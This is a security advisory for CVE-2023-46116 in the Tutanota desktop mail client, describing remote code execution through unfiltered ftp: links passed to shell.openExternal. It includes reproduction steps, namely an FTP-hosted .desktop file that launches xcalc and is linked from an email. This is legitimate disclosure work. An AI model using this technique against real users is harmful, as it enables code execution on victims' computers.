Skip to content

Remote Code Execution via insufficiently sanitized call to shell.openExternal

Critical
charlag published GHSA-mxgj-pq62-f644 Dec 15, 2023

Package

npm tutao/tutanota (npm)

Affected versions

<=3.118.8

Patched versions

3.118.12

Description

Summary

Tutanota allows users to open links in emails in external applications. It correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as ftp:, smb:, etc. which can also be used.

Details

Steps to Reproduce

This PoC uses Ubuntu with the XFCE desktop environment, since it is least complicated to reproduce using this setup

  • Execute and authenticate to the Tutanota desktop version 3.118.8 AppImage on a Ubuntu Desktop with the XFCE environment.
    image
  • On another machine, host an FTP server with anonymous access enabled. Create and place a pwn.desktop file in the FTP root, with the following content:
[Desktop Entry]
Exec=xcalc
Type=Application
  • Send an email to the email account logged in on tutanota containing a hyperlink pointing to the pwn.desktop file on the FTP server. Replace the corresponding values in the hyperlink: ftp://username:password@ip-address/pwn.desktop.
    image
  • On the tutanota desktop application, click on the hyperlink in the email received. Observe that the calculator application opens. You may need to confirm execution of the application in some cases.

PoC

Impact

Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victims computer.

References

Severity

Critical
9.3
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

CVE ID

CVE-2023-46116

Weaknesses

Credits